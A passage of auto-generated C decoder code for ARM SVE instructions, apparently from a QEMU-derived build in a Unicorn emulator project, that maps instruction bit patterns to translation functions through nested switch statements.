&u.f_disas_sve26)) return true; return false; case 0x3: /* 00000100 ..1..... 010011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:389 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_INDEX_rr(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x5: /* 00000100 ..1..... 0101.... ........ */ switch (insn & 0x00c00800) { case 0x00000000: /* 00000100 001..... 01010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:394 */ disas_sve_extract_rd_rn_i6(ctx, &u.f_rri, insn); if (trans_ADDVL(ctx, &u.f_rri)) return true; return false; case 0x00400000: /* 00000100 011..... 01010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:395 */ disas_sve_extract_rd_rn_i6(ctx, &u.f_rri, insn); if (trans_ADDPL(ctx, &u.f_rri)) return true; return false; case 0x00800000: /* 00000100 101..... 01010... ........ */ disas_sve_extract_disas_sve_Fmt_58(ctx, &u.f_disas_sve27, insn); switch ((insn >> 16) & 0x1f) { case 0x1f: /* 00000100 10111111 01010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:398 */ if (trans_RDVL(ctx, &u.f_disas_sve27)) return true; return false; } return false; } return false; case 0x8: /* 00000100 ..1..... 1000.... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 100000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:412 */ if (trans_ASR_zzw(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 100001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:413 */ if (trans_LSR_zzw(ctx, &u.f_rrr_esz)) return true; return false; case 0x3: /* 00000100 ..1..... 100011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:414 */ if (trans_LSL_zzw(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x9: /* 00000100 ..1..... 1001.... ........ */ disas_sve_extract_rd_rn_tszimm(ctx, &u.f_rri_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 100100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:403 */ u.f_rri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); if (trans_ASR_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 100101.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:405 */ u.f_rri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSR_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x3: /* 00000100 ..1..... 100111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:407 */ u.f_rri_esz.imm = tszimm_shl(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSL_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0xa: /* 00000100 ..1..... 1010.... ........ */ disas_sve_extract_rd_rn_msz_rm(ctx, &u.f_rrri, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000100 001..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:419 */ if (trans_ADR_s32(ctx, &u.f_rrri)) return true; return false; case 0x1: /* 00000100 011..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:420 */ if (trans_ADR_u32(ctx, &u.f_rrri)) return true; return false; case 0x2: /* 00000100 101..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:421 */ if (trans_ADR_p32(ctx, &u.f_rrri)) return true; return false; case 0x3: /* 00000100 111..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:422 */ if (trans_ADR_p64(ctx, &u.f_rrri)) return true; return false; } return false; case 0xb: /* 00000100 ..1..... 1011.... ........ */ switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 101100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:435 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_FTSSEL(ctx, &u.f_rrr_esz)) return true; return false; case 0x2: /* 00000100 ..1..... 101110.. ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..100000 101110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:431 */ if (trans_FEXPA(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x3: /* 00000100 ..1..... 101111.. ........ */ disas_sve_extract_disas_sve_Fmt_59(ctx, &u.f_disas_sve28, insn); switch (insn & 0x00df0000) { case 0x00000000: /* 00000100 00100000 101111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:427 */ if (trans_MOVPRFX(ctx, &u.f_disas_sve28)) return true; return false; } return false; } return false; case 0xc: /* 00000100 ..1..... 1100.... ........ */ disas_sve_extract_incdec2_cnt(ctx, &u.f_incdec2_cnt, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 00000100 ..10.... 1100.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:455 */ u.f_incdec2_cnt.d = extract32(insn, 11, 1); u.f_incdec2_cnt.u = extract32(insn, 10, 1); if (trans_SINCDEC_v(ctx, &u.f_incdec2_cnt)) return true; return false; case 0x1: /* 00000100 ..11.... 1100.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 00000100 ..11.... 11000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:451 */ u.f_incdec2_cnt.d = extract32(insn, 10, 1); u.f_incdec2_cnt.u = 1; if (trans_INCDEC_v(ctx, &u.f_incdec2_cnt)) return true; return false; } return false; } return false; case 0xe: /* 00000100 ..1..... 1110.... ........ */ disas_sve_extract_incdec_cnt(ctx, &u.f_incdec_cnt, insn); switch (insn & 0x00100800) { case 0x00000000: /* 00000100 ..10.... 11100... ........ */ switch ((insn >> 10) & 0x1) { case 0x0: /* 00000100 ..10.... 111000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:440 */ u.f_incdec_cnt.d = 0; u.f_incdec_cnt.u = 1; if (trans_CNT_r(ctx, &u.f_incdec_cnt)) return true; return false; } return false; case 0x00100000: /* 00000100 ..11.... 11100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:443 */ u.f_incdec_cnt.d = extract32(insn, 10, 1); u.f_incdec_cnt.u = 1; if (trans_INCDEC_r(ctx, &u.f_incdec_cnt)) return true; return false; } return false; case 0xf: /* 00000100 ..1..... 1111.... ........ */ disas_sve_extract_incdec_cnt(ctx, &u.f_incdec_cnt, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 00000100 ..10.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:446 */ u.f_incdec_cnt.d = extract32(insn, 11, 1); u.f_incdec_cnt.u = extract32(insn, 10, 1); if (trans_SINCDEC_r_32(ctx, &u.f_incdec_cnt)) return true; return false; case 0x1: /* 00000100 ..11.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:447 */ u.f_incdec_cnt.d = extract32(insn, 11, 1); u.f_incdec_cnt.u = extract32(insn, 10, 1); if (trans_SINCDEC_r_64(ctx, &u.f_incdec_cnt)) return true; return false; } return false; } return false; case 0x01000000: /* 00000101 ..0..... ........ ........ */ switch ((insn >> 20) & 0x1) { case 0x0: /* 00000101 ..00.... ........ ........ */ switch (insn & 0x00cc0000) { case 0x00000000: /* 00000101 000000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:460 */ disas_sve_extract_rdn_dbm(ctx, &u.f_rr_dbm, insn); if (trans_ORR_zzi(ctx, &u.f_rr_dbm)) return true; return false; case 0x00400000: /* 00000101 010000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:461 */ disas_sve_extract_rdn_dbm(ctx, &u.f_rr_dbm, insn); if (trans_EOR_zzi(ctx, &u.f_rr_dbm)) return true; return false; case 0x00800000: /* 00000101 100000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:462 */ disas_sve_extract_rdn_dbm(ctx, &u.f_rr_dbm, insn); if (trans_AND_zzi(ctx, &u.f_rr_dbm)) return true; return false; case 0x00c00000: /* 00000101 110000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:465 */ disas_sve_extract_disas_sve_Fmt_60(ctx, &u.f_disas_sve29, insn); if (trans_DUPM(ctx, &u.f_disas_sve29)) return true; return false; } return false; case 0x1: /* 00000101 ..01.... ........ ........ */ disas_sve_extract_rdn_pg4(ctx, &u.f_rpri_esz, insn); switch ((insn >> 14) & 0x3) { case 0x0: /* 00000101 ..01.... 00...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:474 */ u.f_rpri_esz.imm = expand_imm_sh8s(ctx, extract32(insn, 5, 9)); if (trans_CPY_z_i(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00000101 ..01.... 01...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:473 */ u.f_rpri_esz.imm = expand_imm_sh8s(ctx, extract32(insn, 5, 9)); if (trans_CPY_m_i(ctx, &u.f_rpri_esz)) return true; return false; case 0x3: /* 00000101 ..01.... 11...... ........ */ switch ((insn >> 13) & 0x1) { case 0x0: /* 00000101 ..01.... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:470 */ u.f_rpri_esz.imm = extract32(insn, 5, 8); if (trans_FCPY(ctx, &u.f_rpri_esz)) return true; return false; } return false; } return false; } return false; case 0x01200000: /* 00000101 ..1..... ........ ........ */ switch ((insn >> 14) & 0x3) { case 0x0: /* 00000101 ..1..... 00...... ........ */ switch ((insn >> 13) & 0x1) { case 0x0: /* 00000101 ..1..... 000..... ........ */ disas_sve_extract_disas_sve_Fmt_61(ctx, &u.f_rrri, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000101 001..... 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:479 */ if (trans_EXT(ctx, &u.f_rrri)) return true; return false; } return false; case 0x1: /* 00000101 ..1..... 001..... ........ */ switch ((insn >> 10) & 0x7) { case 0x0: /* 00000101 ..1..... 001000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:488 */ disas_sve_extract_disas_sve_Fmt_62(ctx, &u.f_rri, insn); if (trans_DUP_x(ctx, &u.f_rri)) return true; return false; case 0x4: /* 00000101 ..1..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:501 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_TBL(ctx, &u.f_rrr_esz)) return true; return false; case 0x6: /* 00000101 ..1..... 001110.. ........ */ switch ((insn >> 18) & 0x7) { case 0x0: /* 00000101 ..1000.. 001110.. ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..100000 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:485 */ if (trans_DUP_s(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x1: /* 00000101 ..1001.. 001110.. ........ */ disas_sve_extract_rdn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..100100 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:495 */ if (trans_INSR_r(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x4: /* 00000101 ..1100.. 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:504 */ disas_sve_extract_disas_sve_Fmt_63(ctx, &u.f_disas_sve30, insn); if (trans_UNPK(ctx, &u.f_disas_sve30)) return true; return false; case 0x5: /* 00000101 ..1101.. 001110.. ........ */ disas_sve_extract_rdn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..110100 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:492 */ if (trans_INSR_f(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x6: /* 00000101 ..1110.. 001110.. ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 16) & 0x3) { case 0x0: /* 00000101 ..111000 001110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:498 */ if (trans_REV_v(ctx, &u.f_rr_esz)) return true; return false; } return false; } return false; } return false; } return false; case 0x1: /* 00000101 ..1..... 01...... ........ */ switch ((insn >> 10) & 0xf) { case 0x0: /* 00000101 ..1..... 010000.. ........ */ switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:509 */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); if (trans_ZIP1_p(ctx, &u.f_rrr_esz)) return true; return false; case 0x00100000: /* 00000101 ..11.... 0100000. ...0.... */ switch ((insn >> 16) & 0xf) { case 0x0: /* 00000101 ..110000 0100000. ...0.... */ disas_sve_extract_pd_pn_e0(ctx, &u.f_rr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000101 00110000 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:520 */ if (trans_PUNPKLO(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x1: /* 00000101 ..110001 0100000. ...0.... */ disas_sve_extract_pd_pn_e0(ctx, &u.f_rr_esz, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000101 00110001 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:521 */ if (trans_PUNPKHI(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x4: /* 00000101 ..110100 0100000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:517 */ disas_sve_extract_pd_pn(ctx, &u.f_rr_esz, insn); if (trans_REV_p(ctx, &u.f_rr_esz)) return true; return false; } return false; } return false; case 0x1: /* 00000101 ..1..... 010001.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100010. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:510 */ if (trans_ZIP2_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x2: /* 00000101 ..1..... 010010.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100100. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:511 */ if (trans_UZP1_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x3: /* 00000101 ..1..... 010011.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0100110. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:512 */ if (trans_UZP2_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x4: /* 00000101 ..1..... 010100.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0101000. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:513 */ if (trans_TRN1_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x5: /* 00000101 ..1..... 010101.. ........ */ disas_sve_extract_pd_pn_pm(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00100210) { case 0x00000000: /* 00000101 ..10.... 0101010. ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:514 */ if (trans_TRN2_p(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x8: /* 00000101 ..1..... 011000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:526 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_ZIP1_z(ctx, &u.f_rrr_esz)) return true; return false; case 0x9: /* 00000101 ..1..... 011001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:527 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_ZIP2_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xa: /* 00000101 ..1..... 011010.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:528 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_UZP1_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xb: /* 00000101 ..1..... 011011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:529 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_UZP2_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xc: /* 00000101 ..1..... 011100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:530 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_TRN1_z(ctx, &u.f_rrr_esz)) return true; return false; case 0xd: /* 00000101 ..1..... 011101.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:531 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_TRN2_z(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x2: /* 00000101 ..1..... 10...... ........ */ switch (insn & 0x001f2000) { case 0x00000000: /* 00000101 ..100000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:560 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CPY_m_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x00002000: /* 00000101 ..100000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:556 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTA_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00010000: /* 00000101 ..100001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:537 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_COMPACT(ctx, &u.f_rpr_esz)) return true; return false; case 0x00012000: /* 00000101 ..100001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:557 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTB_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00020000: /* 00000101 ..100010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:552 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTA_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x00030000: /* 00000101 ..100011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:553 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_LASTB_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x00040000: /* 00000101 ..100100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:567 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_REVB(ctx, &u.f_rpr_esz)) return true; return false; case 0x00050000: /* 00000101 ..100101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:568 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_REVH(ctx, &u.f_rpr_esz)) return true; return false; case 0x00060000: /* 00000101 ..100110 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:569 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_REVW(ctx, &u.f_rpr_esz)) return true; return false; case 0x00070000: /* 00000101 ..100111 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:570 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_RBIT(ctx, &u.f_rpr_esz)) return true; return false; case 0x00080000: /* 00000101 ..101000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:540 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_CLASTA_z(ctx, &u.f_rprr_esz)) return true; return false; case 0x00082000: /* 00000101 ..101000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:563 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CPY_m_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00090000: /* 00000101 ..101001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:541 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_CLASTB_z(ctx, &u.f_rprr_esz)) return true; return false; case 0x000a0000: /* 00000101 ..101010 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:544 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTA_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x000b0000: /* 00000101 ..101011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:545 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTB_v(ctx, &u.f_rpr_esz)) return true; return false; case 0x000c0000: /* 00000101 ..101100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:573 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SPLICE(ctx, &u.f_rprr_esz)) return true; return false; case 0x00102000: /* 00000101 ..110000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:548 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTA_r(ctx, &u.f_rpr_esz)) return true; return false; case 0x00112000: /* 00000101 ..110001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:549 */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); if (trans_CLASTB_r(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x3: /* 00000101 ..1..... 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:578 */ disas_sve_extract_rd_pg4_rn_rm(ctx, &u.f_rprr_esz, insn); if (trans_SEL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; } return false; case 0x12: /* 0010010. ........ ........ ........ */ switch (insn & 0x01200000) { case 0x00000000: /* 00100100 ..0..... ........ ........ */ disas_sve_extract_pd_pg_rn_rm(ctx, &u.f_rprr_esz, insn); switch (insn & 0x0000e010) { case 0x00000000: /* 00100100 ..0..... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:583 */ if (trans_CMPHS_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x00000010: /* 00100100 ..0..... 000..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:584 */ if (trans_CMPHI_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x00002000: /* 00100100 ..0..... 001..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:592 */ if (trans_CMPEQ_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00002010: /* 00100100 ..0..... 001..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:593 */ if (trans_CMPNE_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00004000: /* 00100100 ..0..... 010..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:594 */ if (trans_CMPGE_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00004010: /* 00100100 ..0..... 010..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:595 */ if (trans_CMPGT_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00006000: /* 00100100 ..0..... 011..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:596 */ if (trans_CMPLT_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00006010: /* 00100100 ..0..... 011..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:597 */ if (trans_CMPLE_ppzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x00008000: /* 00100100 ..0..... 100..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:585 */ if (trans_CMPGE_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x00008010: /* 00100100 ..0..... 100..... ...1.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:586 */ if (trans_CMPGT_ppzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x0000a000: /* 00100100 ..0..... 101..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:587 */ if 